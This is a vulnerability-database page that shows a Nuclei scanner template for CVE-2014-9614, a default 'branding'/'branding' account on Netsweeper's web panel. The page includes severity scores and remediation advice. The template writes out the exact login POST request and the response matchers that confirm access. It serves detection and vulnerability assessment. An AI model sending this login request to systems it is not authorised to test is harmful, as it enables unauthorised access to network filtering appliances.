Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2014-9614
HistoryDec 06, 2021 - 4:38 p.m.

Netsweeper 4.0.5 - Default Weak Account

2021-12-0616:38:54
ProjectDiscovery
github.com
5
netsweeper
default password
remote attackers
access
cve2014
branding account
web panel

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.4

Confidence

High

EPSS

0.014

Percentile

86.6%

The Web Panel in Netsweeper before 4.0.5 has a default password of ‘branding’ for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.

id: CVE-2014-9614

info:
  name: Netsweeper 4.0.5 - Default Weak Account
  author: daffainfo
  severity: critical
  description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.
  impact: |
    An attacker can gain unauthorized access to the Netsweeper 4.0.5 system using the default weak account.
  remediation: |
    Change the default credentials to strong and unique ones.
  reference:
    - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
    - https://nvd.nist.gov/vuln/detail/CVE-2014-9614
    - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-9614
    cwe-id: CWE-798
    epss-score: 0.01433
    epss-percentile: 0.8655
    cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netsweeper
    product: netsweeper
  tags: cve2014,cve,netsweeper,default-login,packetstorm,xss

http:
  - raw:
      - |
        POST /webadmin/auth/verification.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/webadmin/start/

        login=branding&password=branding&Submit=Login

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Location: ../common/'
          - 'Location: ../start/'
        condition: or

      - type: word
        part: header
        words:
          - 'Set-Cookie: webadminU='

      - type: status
        status:
          - 302
# digest: 490a0046304402202f2136d9d8c06c91744feb7dc1c42ffe6f13823841c3487a6844921ceaf142b2022003c2cbb6c9e75bae775fe0fc06e8ee12133e6d53c40b011a5d8b35cac33287ed:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.4

Confidence

High

EPSS

0.014

Percentile

86.6%

Related for NUCLEI:CVE-2014-9614